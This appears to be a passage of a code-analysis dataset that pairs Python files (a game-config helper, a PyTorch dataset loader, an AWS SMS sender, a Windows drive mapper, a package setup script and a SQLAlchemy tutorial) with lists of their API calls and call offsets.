def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
if __name__ == '__main__':
# TODO: return to pass before building
a = CFG()
# class UserInfo:
#
# def __init__(self):
#
# self.game_install_path = None
#
# self.config_file_name = "thundertac.ini"
# cp = configparser.ConfigParser()
#
# self.players_sys = platform.system()
# self.players_uid = getpass.getuser()
# self.players_cid = socket.gethostname()
# self.players_arc = platform.architecture()
#
# if self.players_sys == "Darwin":
# # self.players_uid = "MAC SUPPORT LIMITED - HELP NEEDED"
# self.wargame_cfg = 'My Games/WarThunder'
#
# elif self.players_sys == "Linux":
# # self.players_uid = os.getenv('USER')
# self.wargame_cfg = '.config/WarThunder'
#
# elif self.players_sys == "Windows":
# # self.players_uid = os.getenv('USERNAME')
# self.wargame_cfg = 'Documents/My Games/WarThunder'
#
# self.game_settings_root = pathlib.Path.home().joinpath(self.wargame_cfg)
# self.tacx_settings_file = self.game_settings_root.joinpath(self.config_file_name)
#
# self.wargame_dir_known = False
#
# self.game_install_path = self.get_game_root_dir()
#
# # cp.read(self.tacx_settings_file)
# # if cp.has_section('path'):
# # if pathlib.Path(cp['path']['war_path']).exists():
# # self.game_install_path = pathlib.Path(cp['path']['war_path'])
# # if self.game_install_path == "":
# # self.game_install_path = self.get_game_root_dir()
# # cp['path']['war_path'] = str(self.game_install_path)
# # with open(self.tacx_settings_file, 'w') as f:
# # cp.write(f)
#
# def get_game_root_dir(self):
# platform_lookup = {"Windows": "aces.exe", "Linux": "aces"}
# for pid in psutil.pids():
# psutil.Process(pid).name()
# if psutil.Process(pid).name() == platform_lookup[self.players_sys]:
# aces_pid = pid
# p = psutil.Process(aces_pid)
# game_path_exe = pathlib.Path(p.exe())
# self.game_install_path = game_path_exe.parent.parent
# self.wargame_dir_known = True
# return self.game_install_path
#
# def get_game_version(self):
# if not self.wargame_dir_known:
# self.get_game_root_dir()
# if self.wargame_dir_known:
# version_file = self.game_install_path.joinpath('content/pkg_main.ver')
# with open(version_file, "r") as frv:
# return frv.read()
#
# def aces_language(self):
# path_config_blk = self.game_install_path.joinpath('config.blk')
# with open(path_config_blk) as f:
# lines = f.readlines()
# for line in lines:
# if line.startswith('language'):
# return line.split(':t=')[1]
|
[
"sys.stdout.write",
"getpass.getuser",
"pathlib.Path.home",
"pathlib.Path",
"sys.stdout.flush",
"os.path.join",
"psutil.process_iter",
"platform.architecture",
"loguru.logger.warning",
"socket.gethostname",
"requests.get",
"configparser.ConfigParser",
"cursor.cursor.hide",
"re.search",
"threading.Thread",
"time.sleep",
"platform.system",
"sys.exit",
"psutil.Process",
"cursor.cursor.show"
] |
[((878, 895), 'platform.system', 'platform.system', ([], {}), '()\n', (893, 895), False, 'import platform\n'), ((923, 940), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (938, 940), False, 'import getpass\n'), ((968, 988), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (986, 988), False, 'import socket\n'), ((1016, 1039), 'platform.architecture', 'platform.architecture', ([], {}), '()\n', (1037, 1039), False, 'import platform\n'), ((1059, 1086), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1084, 1086), False, 'import configparser\n'), ((12066, 12088), 'time.sleep', 'time.sleep', (['self.delay'], {}), '(self.delay)\n', (12076, 12088), False, 'import time\n'), ((2077, 2284), 'loguru.logger.warning', 'loguru.logger.warning', (['"""*nix users must manually enter the path to there WINE installed Tacview root + /Data/Terrain/Textures/ \nEX:\'/home/divine/Programs/Tacview (beta)/Data/Terrain/Textures/\'"""'], {}), '(\n    """*nix users must manually enter the path to there WINE installed Tacview root + /Data/Terrain/Textures/ \nEX:\'/home/divine/Programs/Tacview (beta)/Data/Terrain/Textures/\'"""\n    )\n', (2098, 2284), False, 'import loguru\n'), ((3331, 3348), 'platform.system', 'platform.system', ([], {}), '()\n', (3346, 3348), False, 'import platform\n'), ((6067, 6105), 'pathlib.Path', 'pathlib.Path', (["self.cfg_dir['war_path']"], {}), "(self.cfg_dir['war_path'])\n", (6079, 6105), False, 'import pathlib\n'), ((9437, 9526), 're.search', 're.search', (['"""(\\\\w+)\\\\[(\\\\d+)] successfully passed yuplay authorization"""', 'decoded', 're.M'], {}), "('(\\\\w+)\\\\[(\\\\d+)] successfully passed yuplay authorization',\n    decoded, re.M)\n", (9446, 9526), False, 'import re\n'), ((11755, 11773), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11771, 11773), False, 'import sys\n'), ((11786, 11808), 'time.sleep', 'time.sleep', (['self.delay'], {}), '(self.delay)\n', (11796, 11808), False, 'import time\n'), ((11821, 11843), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (11837, 11843), False, 'import sys\n'), ((11856, 11874), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11872, 11874), False, 'import sys\n'), ((1554, 1573), 'pathlib.Path.home', 'pathlib.Path.home', ([], {}), '()\n', (1571, 1573), False, 'import pathlib\n'), ((2479, 2550), 'os.path.join', 'os.path.join', (["os.environ['APPDATA']", '"""Tacview\\\\Data\\\\Terrain\\\\Textures"""'], {}), "(os.environ['APPDATA'], 'Tacview\\\\Data\\\\Terrain\\\\Textures')\n", (2491, 2550), False, 'import os\n'), ((2586, 2605), 'pathlib.Path.home', 'pathlib.Path.home', ([], {}), '()\n', (2603, 2605), False, 'import pathlib\n'), ((2951, 2988), 'pathlib.Path', 'pathlib.Path', (['self.user_settings_file'], {}), '(self.user_settings_file)\n', (2963, 2988), False, 'import pathlib\n'), ((6302, 6315), 'cursor.cursor.hide', 'cursor.hide', ([], {}), '()\n', (6313, 6315), False, 'from cursor import cursor\n'), ((11934, 11976), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.spinner_task'}), '(target=self.spinner_task)\n', (11950, 11976), False, 'import threading\n'), ((3230, 3267), 'pathlib.Path', 'pathlib.Path', (['self.game_settings_root'], {}), '(self.game_settings_root)\n', (3242, 3267), False, 'import pathlib\n'), ((7009, 7022), 'cursor.cursor.show', 'cursor.show', ([], {}), '()\n', (7020, 7022), False, 'from cursor import cursor\n'), ((7039, 7049), 'sys.exit', 'sys.exit', ([], {}), '()\n', (7047, 7049), False, 'import sys\n'), ((10738, 10782), 'requests.get', 'requests.get', (['f"""{self.CHAT}?lastId={lastId}"""'], {}), "(f'{self.CHAT}?lastId={lastId}')\n", (10750, 10782), False, 'import requests\n'), ((6579, 6600), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (6598, 6600), False, 'import psutil\n'), ((6939, 6954), 'time.sleep', 'time.sleep', (['(0.9)'], {}), '(0.9)\n', (6949, 6954), False, 'import time\n'), ((6705, 6732), 'psutil.Process', 'psutil.Process', (['pid_list[0]'], {}), '(pid_list[0])\n', (6719, 6732), False, 'import psutil\n')]
|
"""
Modified version of the PyTorch DatasetFolder class to make custom dataloading possible
"""
import os
import os.path
from torchvision.datasets import VisionDataset
def has_file_allowed_extension(filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
extensions (tuple of strings): extensions to consider (lowercase)
Returns:
bool: True if the filename ends with one of given extensions
"""
return filename.lower().endswith(extensions)
def default_pretransform(sample, values):
"""Returns the image sample without transforming it at all
Args:
sample: Loaded image data
        values: Tuple whose element at index 1 is the target (by default)
Returns:
        object: The loaded sample image
int: Value representing the image class (label for data)
"""
target = values[1]
return sample, target
def make_dataset(
directory,
class_to_idx,
extensions=None,
is_valid_file=None,
instance="train",
index=None,
train_test_val_instances=None,
):
"""Makes the actual dataset
Args:
directory (string): Root directory path.
class_to_idx (dict): Dict which maps classes to index values
extensions (tuple[string]): A list of allowed extensions. both extensions and is_valid_file should not be passed.
        is_valid_file (callable, optional): A function that takes the path of a file and checks whether it is a valid file (used to filter out corrupt files). Both extensions and is_valid_file should not be passed.
instance (str): String signifying data segment (train, test, val)
index (dict): Index file dict data
train_test_val_instances (callable, optional): Returns custom breakup for train, test, val data
Returns:
list: List of PyTorch instance data to be loaded
"""
directory = os.path.expanduser(directory)
both_none = extensions is None and is_valid_file is None
both_something = extensions is not None and is_valid_file is not None
if both_none or both_something:
raise ValueError(
"Both extensions and is_valid_file cannot be None or not None at the same time"
)
if extensions is not None:
def is_valid_file(x):
return has_file_allowed_extension(x, extensions)
train, test, val = train_test_val_instances(
directory, class_to_idx, index, is_valid_file
)
return train if instance == "train" else test if instance == "test" else val
class DatasetFolder(VisionDataset):
"""A generic data loader ::
Args:
root (string): Root directory path.
loader (callable): A function to load a sample given its path.
extensions (tuple[string]): A list of allowed extensions.
both extensions and is_valid_file should not be passed.
transform (callable, optional): A function/transform that takes in
a sample and returns a transformed version.
E.g, ``transforms.RandomCrop`` for images.
target_transform (callable, optional): A function/transform that takes
in the target and transforms it.
        is_valid_file (callable, optional): A function that takes the path of a file
            and checks whether it is a valid file (used to filter out corrupt files).
            Both extensions and is_valid_file should not be passed.
        instance (string, optional): Either 'train', 'test' or 'val', selecting which of the train, test or val splits is returned
        index (dict[string:list[string]], optional): A dictionary that maps each class to a list of the image paths for that class along with whatever other data you need to make your dataset
this can really be whatever you want because it is only handled by train_test_val_instances.
train_test_val_instances (callable, optional): A function that takes:
a root directory,
            a mapping of class names to indices,
the index,
and is_valid_file
and returns a tuple of lists containing the instance data for each of train test and val,
the instance data in the list is a tuple and can have whatever structure you want as long as the image path is the first element
each of these tuples is processed by the pretransform
        class_data (tuple, optional): the first element is a list of the classes, the second is a mapping of the classes to their indices
pretransform (callable, optional): A function that takes the loaded image and any other relevant data for that image and returns a transformed version of that image
Attributes:
classes (list): List of the class names sorted alphabetically.
class_to_idx (dict): Dict with items (class_name, class_index).
pretransform (callable): returns a transformed image using data in the sample
class_data (tuple): (classes, class_to_idx)
samples (tuple): tuple of three (train test val) lists of (sample path, class_index, whatever else, ...) tuples
Unused: targets (list): The class_index value for each image in the dataset
"""
def __init__(
self,
root,
loader,
extensions,
transform,
target_transform,
is_valid_file,
instance,
index,
train_test_val_instances,
class_data,
pretransform,
):
super(DatasetFolder, self).__init__(
root, transform=transform, target_transform=target_transform
)
self.index = index
self.class_data = class_data
self.pretransform = (
default_pretransform if pretransform is None else pretransform
)
classes, class_to_idx = self._find_classes(self.root)
samples = make_dataset(
self.root,
class_to_idx,
extensions,
is_valid_file,
instance,
index,
train_test_val_instances,
)
self.loader = loader
self.extensions = extensions
self.classes = classes
self.class_to_idx = class_to_idx
self.samples = samples
self.targets = [s[1] for s in samples]
def _find_classes(self, root_dir):
"""
Finds the class folders in a dataset.
Args:
root_dir (string): Root directory path.
Returns:
tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.
Ensures:
No class is a subdirectory of another.
"""
classes, class_to_idx = self.class_data(root_dir, self.index)
return classes, class_to_idx
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
# path, target, pt = self.samples[index]
values = self.samples[index]
path = values[0]
sample = self.loader(path)
sample, target = self.pretransform(sample, values)
if self.transform is not None:
sample = self.transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __len__(self):
return len(self.samples)
|
[
"os.path.expanduser"
] |
[((1932, 1961), 'os.path.expanduser', 'os.path.expanduser', (['directory'], {}), '(directory)\n', (1950, 1961), False, 'import os\n')]
|
import os
class AwsSmsProvider(object):
def __init__(self, **kargs):
        # A plain import is a cheap no-op when boto3 is already loaded, and it
        # always binds the local name (the old sys.modules check did not).
        import boto3
if 'region_name' not in kargs:
kargs['region_name'] = os.environ.get('AWS_SNS_REGION_NAME',
'us-east-1')
self.client = boto3.client('sns', **kargs)
# TODO: Add tags
def send(self, phone_number, message):
response = self.client.publish(
PhoneNumber=phone_number,
Message=message,
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
return True, response['MessageId']
else:
return False, RuntimeError()
def get_provider_sms(name='aws', **kargs):
provider = {
'aws': AwsSmsProvider(**kargs)
}
return provider[name]
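# Note: the provider dict above is built eagerly, so AwsSmsProvider is
# instantiated before the name lookup happens.
# Hedged usage sketch (number and message are placeholders):
#   sms = get_provider_sms('aws', region_name='us-east-1')
#   ok, result = sms.send('+15555550123', 'hello from SNS')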
|
[
"os.environ.get",
"boto3.client"
] |
[((348, 376), 'boto3.client', 'boto3.client', (['"""sns"""'], {}), "('sns', **kargs)\n", (360, 376), False, 'import boto3\n'), ((225, 275), 'os.environ.get', 'os.environ.get', (['"""AWS_SNS_REGION_NAME"""', '"""us-east-1"""'], {}), "('AWS_SNS_REGION_NAME', 'us-east-1')\n", (239, 275), False, 'import os\n')]
|
import hydra
from omegaconf import DictConfig, OmegaConf
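# Hydra resolves config/train.yaml relative to this file and injects it as a
# DictConfig; the config path/name here are whatever the project defines.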
@hydra.main(config_path="config", config_name="train")
def my_app(cfg: DictConfig) -> None:
print(OmegaConf.to_yaml(cfg))
if __name__ == "__main__":
my_app()
|
[
"omegaconf.OmegaConf.to_yaml",
"hydra.main"
] |
[((60, 113), 'hydra.main', 'hydra.main', ([], {'config_path': '"""config"""', 'config_name': '"""train"""'}), "(config_path='config', config_name='train')\n", (70, 113), False, 'import hydra\n'), ((161, 183), 'omegaconf.OmegaConf.to_yaml', 'OmegaConf.to_yaml', (['cfg'], {}), '(cfg)\n', (178, 183), False, 'from omegaconf import DictConfig, OmegaConf\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This module is part of the opsi PackageBuilder
see: https://forum.opsi.org/viewforum.php?f=22
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__author__ = '<NAME>'
__copyright__ = "Copyright 2013-2015, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
import ctypes
import ctypes.wintypes
class MapDrive(object):
"""
Maps windows network drives.
"""
class NETRESOURCEW(ctypes.Structure):
# https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/ns-winnetwk-netresourcew
_fields_ = [
("dwScope", ctypes.wintypes.DWORD),
("dwType", ctypes.wintypes.DWORD),
("dwDisplayType", ctypes.wintypes.DWORD),
("dwUsage", ctypes.wintypes.DWORD),
("lpLocalName", ctypes.wintypes.LPWSTR),
("lpRemoteName", ctypes.wintypes.LPWSTR),
("lpComment", ctypes.wintypes.LPWSTR),
("lpProvider", ctypes.wintypes.LPWSTR)
]
WNetAddConnection2 = ctypes.windll.MPR.WNetAddConnection2W # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetaddconnection2w
WNetAddConnection2.argtypes = [ctypes.POINTER(NETRESOURCEW), ctypes.wintypes.LPCWSTR, ctypes.wintypes.LPCWSTR, ctypes.wintypes.BOOL]
WNetCancelConnection2 = ctypes.windll.MPR.WNetCancelConnection2W # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetcancelconnection2w
WNetCancelConnection2.argtypes = [ctypes.wintypes.LPCWSTR, ctypes.wintypes.DWORD, ctypes.wintypes.BOOL]
RESOURCE_TYPE_DISK = 1
RESOURCE_USAGE_IGNORED = 0
FLAG_CONNECT_UPDATE_PROFILE = 1
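    # These mirror the corresponding WinNetWk constants (RESOURCETYPE_DISK
    # and CONNECT_UPDATE_PROFILE are both 1 in the Windows headers).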
@classmethod
def mapDrive(cls, name, path, username, password):
nr = cls.NETRESOURCEW()
nr.dwType = cls.RESOURCE_TYPE_DISK
nr.lpLocalName = name
nr.lpRemoteName = path
nr.lpProvider = None
flags = cls.FLAG_CONNECT_UPDATE_PROFILE
retVal = cls.WNetAddConnection2(ctypes.byref(nr), password, username, flags)
msg = ''
if retVal != 0:
msg = ctypes.FormatError(retVal)
return retVal, msg
@classmethod
def unMapDrive(cls, name):
retVal = cls.WNetCancelConnection2(name, cls.FLAG_CONNECT_UPDATE_PROFILE, False)
msg = ''
if retVal != 0:
msg = ctypes.FormatError(retVal)
return retVal, msg
if __name__=="__main__":
print( "MapDrive 1:", MapDrive.mapDrive(
"Y:",
"\\\\path\\to\\be\\mapped",
"username",
"password"
))
|
[
"ctypes.FormatError",
"ctypes.byref",
"ctypes.POINTER"
] |
[((2095, 2123), 'ctypes.POINTER', 'ctypes.POINTER', (['NETRESOURCEW'], {}), '(NETRESOURCEW)\n', (2109, 2123), False, 'import ctypes\n'), ((2894, 2910), 'ctypes.byref', 'ctypes.byref', (['nr'], {}), '(nr)\n', (2906, 2910), False, 'import ctypes\n'), ((2998, 3024), 'ctypes.FormatError', 'ctypes.FormatError', (['retVal'], {}), '(retVal)\n', (3016, 3024), False, 'import ctypes\n'), ((3249, 3275), 'ctypes.FormatError', 'ctypes.FormatError', (['retVal'], {}), '(retVal)\n', (3267, 3275), False, 'import ctypes\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import copy
from zonesafe import *
from adaptevitesserelat import *
from trouvecible import *
orientation=0
orientationm1=0
N=720
lidar1=[]
lidar2=[]
rv=20
m=5
i=0
r1=50
r2=41
epsilon=0.15
alpha=15 # cone correction angle
v=100
deltat=0.1
rmax=1000
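# Build two synthetic 720-beam scans at constant ranges r1 and r2 as test
# input for the zonesafe -> adaptevitesserelat -> trouvecible pipeline.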
while i<N:
lidar1.append((i,r1))
i+=1
i=0
while i<N:
lidar2.append((i,r2))
i+=1
MMMR=zonesafe(lidar2,rv,m)
MMMRC=adaptevitesserelat(lidar1,lidar2,MMMR,alpha,v,deltat,rmax,orientation,orientationm1)
cible=trouvecible(MMMRC)
i=0
while i<len(MMMR):
plt.plot(MMMR[i][2], MMMR[i][3],"b:o")
plt.plot(MMMR[i][4], MMMR[i][5],"r:o")
plt.plot(MMMRC[i][4], MMMRC[i][5],"g:o")
i=i+1
plt.plot(cible[0],cible[1],"y:o")
plt.axis('equal')
plt.show()
# trouvecible tested successfully
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.plot"
] |
[((748, 783), 'matplotlib.pyplot.plot', 'plt.plot', (['cible[0]', 'cible[1]', '"""y:o"""'], {}), "(cible[0], cible[1], 'y:o')\n", (756, 783), True, 'import matplotlib.pyplot as plt\n'), ((783, 800), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (791, 800), True, 'import matplotlib.pyplot as plt\n'), ((802, 812), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (810, 812), True, 'import matplotlib.pyplot as plt\n'), ((607, 646), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMR[i][2]', 'MMMR[i][3]', '"""b:o"""'], {}), "(MMMR[i][2], MMMR[i][3], 'b:o')\n", (615, 646), True, 'import matplotlib.pyplot as plt\n'), ((651, 690), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMR[i][4]', 'MMMR[i][5]', '"""r:o"""'], {}), "(MMMR[i][4], MMMR[i][5], 'r:o')\n", (659, 690), True, 'import matplotlib.pyplot as plt\n'), ((695, 736), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMRC[i][4]', 'MMMRC[i][5]', '"""g:o"""'], {}), "(MMMRC[i][4], MMMRC[i][5], 'g:o')\n", (703, 736), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os.path import join as pjoin
import shutil
from setuptools import setup, find_packages
import distutils.cmd
import distutils.log
import subprocess
from os import path as P
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
HERE = P.dirname((P.abspath(__file__)))
version_ns = {}
execfile(P.join(HERE, 'cooka', '_version.py'), version_ns)
version = version_ns['__version__']
print("__version__=" + version)
with open(P.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
class BuildJSCommand(distutils.cmd.Command):
    description = 'Build the frontend written in JavaScript'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
# 1. check files
frontend_home = pjoin(HERE, 'packages')
backend_assets = pjoin(HERE, 'cooka', 'assets')
if P.exists(backend_assets):
raise RuntimeError(f"Assets path {backend_assets} already exists")
# 2. install deps by yarn
yarn_executable = 'yarn'
self.announce("yarn install ", distutils.log.INFO)
subprocess.call([yarn_executable, 'install'], cwd=frontend_home)
# 3. build assets
self.announce("yarn build ", distutils.log.INFO)
subprocess.call([yarn_executable, 'build'], cwd=frontend_home)
# 4. copy to python package
frontend_dist = pjoin(frontend_home, 'dist')
shutil.copytree(frontend_dist, backend_assets)
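# Typical invocation (assumed workflow): `python setup.py buildjs` before the
# usual build/install step, so the compiled frontend assets ship with the wheel.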
if __name__ == '__main__':
setup(
name="cooka",
version=version,
description="A lightweight AutoML system.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(exclude=["test.*", "test"]),
author="DataCanvas Community",
author_email="<EMAIL>",
cmdclass={'buildjs': BuildJSCommand},
python_requires='>=3.6.*',
license='Apache License 2.0',
install_requires=[
'numpy',
'pandas',
'scikit-learn>=0.22.1',
'requests',
'SQLAlchemy>=1.3.18',
'tornado==6.0.4',
'jinja2',
'deeptables==0.1.13',
'hypergbm==0.2.2',
'traitlets',
],
# extras_require={
# 'notebook': [
# 'shap',
# 'jupyterlab',
# 'matplotlib'
# 'pyecharts'
# ]
# },
zip_safe=False,
platforms="Linux, Mac OS X",
classifiers=[
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: Apache Software License',
],
entry_points={
'console_scripts': [
'cooka = cooka.cli:main',
]
},
include_package_data=True,
package_data={
            'cooka': ['core/train_template/*.jinja2', '*.template', 'assets/*', 'assets/static/*'],  # package_data cannot include directories recursively
}
)
|
[
"os.path.abspath",
"os.path.exists",
"subprocess.call",
"shutil.copytree",
"os.path.join",
"setuptools.find_packages"
] |
[((422, 441), 'os.path.abspath', 'P.abspath', (['__file__'], {}), '(__file__)\n', (431, 441), True, 'from os import path as P\n'), ((470, 506), 'os.path.join', 'P.join', (['HERE', '"""cooka"""', '"""_version.py"""'], {}), "(HERE, 'cooka', '_version.py')\n", (476, 506), True, 'from os import path as P\n'), ((600, 625), 'os.path.join', 'P.join', (['HERE', '"""README.md"""'], {}), "(HERE, 'README.md')\n", (606, 625), True, 'from os import path as P\n'), ((978, 1001), 'os.path.join', 'pjoin', (['HERE', '"""packages"""'], {}), "(HERE, 'packages')\n", (983, 1001), True, 'from os.path import join as pjoin\n'), ((1027, 1057), 'os.path.join', 'pjoin', (['HERE', '"""cooka"""', '"""assets"""'], {}), "(HERE, 'cooka', 'assets')\n", (1032, 1057), True, 'from os.path import join as pjoin\n'), ((1069, 1093), 'os.path.exists', 'P.exists', (['backend_assets'], {}), '(backend_assets)\n', (1077, 1093), True, 'from os import path as P\n'), ((1309, 1373), 'subprocess.call', 'subprocess.call', (["[yarn_executable, 'install']"], {'cwd': 'frontend_home'}), "([yarn_executable, 'install'], cwd=frontend_home)\n", (1324, 1373), False, 'import subprocess\n'), ((1466, 1528), 'subprocess.call', 'subprocess.call', (["[yarn_executable, 'build']"], {'cwd': 'frontend_home'}), "([yarn_executable, 'build'], cwd=frontend_home)\n", (1481, 1528), False, 'import subprocess\n'), ((1591, 1619), 'os.path.join', 'pjoin', (['frontend_home', '"""dist"""'], {}), "(frontend_home, 'dist')\n", (1596, 1619), True, 'from os.path import join as pjoin\n'), ((1628, 1674), 'shutil.copytree', 'shutil.copytree', (['frontend_dist', 'backend_assets'], {}), '(frontend_dist, backend_assets)\n', (1643, 1674), False, 'import shutil\n'), ((1930, 1971), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['test.*', 'test']"}), "(exclude=['test.*', 'test'])\n", (1943, 1971), False, 'from setuptools import setup, find_packages\n')]
|
from sqlalchemy import select
from sqlalchemy.sql import func
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, MetaData, Table, Integer, String, \
Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union
from datetime import datetime
engine = create_engine('sqlite:///Sqlite-Data/sqlite3.db')
session = Session(bind=engine)
metadata = MetaData()
customers = Table('customers', metadata,
Column('id', Integer(), primary_key=True),
Column('first_name', String(100), nullable=False),
Column('last_name', String(100), nullable=False),
Column('username', String(50), nullable=False),
Column('email', String(200), nullable=False),
Column('address', String(200), nullable=False),
Column('town', String(50), nullable=False),
Column('created_on', DateTime(), default=datetime.now),
Column('updated_on', DateTime(), default=datetime.now, onupdate=datetime.now)
)
items = Table('items', metadata,
Column('id', Integer(), primary_key=True),
Column('name', String(200), nullable=False),
Column('cost_price', Numeric(10, 2), nullable=False),
Column('selling_price', Numeric(10, 2), nullable=False),
Column('quantity', Integer(), nullable=False),
CheckConstraint('quantity > 0', name='quantity_check')
)
orders = Table('orders', metadata,
Column('id', Integer(), primary_key=True),
Column('customer_id', ForeignKey('customers.id')),
Column('date_placed', DateTime(), default=datetime.now),
Column('date_shipped', DateTime())
)
order_lines = Table('order_lines', metadata,
Column('id', Integer(), primary_key=True),
Column('order_id', ForeignKey('orders.id')),
Column('item_id', ForeignKey('items.id')),
Column('quantity', Integer())
)
customers_list = [
{
"first_name": "John",
"last_name": "Lara",
"username": "johnlara",
"email": "<EMAIL>",
"address": "3073 Derek Drive",
"town": "Norfolk"
},
{
"first_name": "Sarah",
"last_name": "Tomlin",
"username": "sarahtomlin",
"email": "<EMAIL>",
"address": "3572 Poplar Avenue",
"town": "Norfolk"
},
{
"first_name": "Pablo",
"last_name": "Gibson",
"username": "pablogibson",
"email": "<EMAIL>",
"address": "3494 Murry Street",
"town": "Peterbrugh"
},
{
"first_name": "Pablo",
"last_name": "Lewis",
"username": "pablolewis",
"email": "<EMAIL>",
"address": "3282 Jerry Toth Drive",
"town": "Peterbrugh"
},
]
items_list = [
{
"name": "Chair",
"cost_price": 9.21,
"selling_price": 10.81,
"quantity": 5
},
{
"name": "Pen",
"cost_price": 3.45,
"selling_price": 4.51,
"quantity": 3
},
{
"name": "Headphone",
"cost_price": 15.52,
"selling_price": 16.81,
"quantity": 50
},
{
"name": "Travel Bag",
"cost_price": 20.1,
"selling_price": 24.21,
"quantity": 50
},
{
"name": "Keyboard",
"cost_price": 20.12,
"selling_price": 22.11,
"quantity": 50
},
{
"name": "Monitor",
"cost_price": 200.14,
"selling_price": 212.89,
"quantity": 50
},
{
"name": "Watch",
"cost_price": 100.58,
"selling_price": 104.41,
"quantity": 50
},
{
"name": "<NAME>",
"cost_price": 20.89,
"selling_price": 25.00,
"quantity": 50
},
]
order_list = [
{
"customer_id": 1
},
{
"customer_id": 1
}
]
order_line_list = [
{
"order_id": 1,
"item_id": 1,
"quantity": 5
},
{
"order_id": 1,
"item_id": 2,
"quantity": 2
},
{
"order_id": 1,
"item_id": 3,
"quantity": 1
},
{
"order_id": 2,
"item_id": 1,
"quantity": 5
},
{
"order_id": 2,
"item_id": 2,
"quantity": 5
},
]
# Create the tables before inserting the seed data.
metadata.create_all(engine)
engine.execute(items.insert(), items_list)
engine.execute(customers.insert(), customers_list)
engine.execute(orders.insert(), order_list)
engine.execute(order_lines.insert(), order_line_list)
# Selecting records
s = select([customers])
str(s)
r = engine.execute(s)
r.fetchall()
rs = engine.execute(s)
for row in rs:
print(row)
# Filtering records
s = select([items]).where(
items.c.cost_price > 20)
str(s)
rs = engine.execute(s)
for row in rs:
print(row)
s = select([items]).where(
    ~(items.c.quantity == 50) &
    (items.c.cost_price < 20)
)
engine.execute(s).fetchall()
# Comparison operators
s = select([orders]).where(
    orders.c.date_shipped.is_(None))  # IS NULL; comparing to the string 'None' matches nothing
str(s)
rs = engine.execute(s).fetchall()
for row in rs:
print(row)
# Ordering results
s = select([items]).where(
items.c.quantity > 10
).order_by(items.c.cost_price)
str(s)
rs = engine.execute(s).fetchall()
for row in rs:
print(row)
# Grouping results
c = [
func.count("*").label('count'),
customers.c.town
]
s = select(c).group_by(customers.c.town)
print(s)
engine.execute(s).fetchall()
# Joins
s = select([
    orders.c.id.label('order_id'),
    orders.c.date_placed,
    order_lines.c.quantity,
    items.c.name,
]).select_from(
    orders.join(customers).join(order_lines).join(items)
).where(
    (customers.c.first_name == "John") & (customers.c.last_name == "Lara")
)
str(s)
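# Execute the join (mirroring the earlier sections) and print each row.
rs = engine.execute(s).fetchall()
for row in rs:
    print(row)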
# Deleting data
i = session.query(items).filter(items.c.name == 'Monitor').one()
i
# A row selected from a Core Table is a plain tuple, not an ORM-mapped
# object, so it is removed with a Core delete rather than session.delete().
session.execute(items.delete().where(items.c.name == 'Monitor'))
session.commit()
|
[
"sqlalchemy.MetaData",
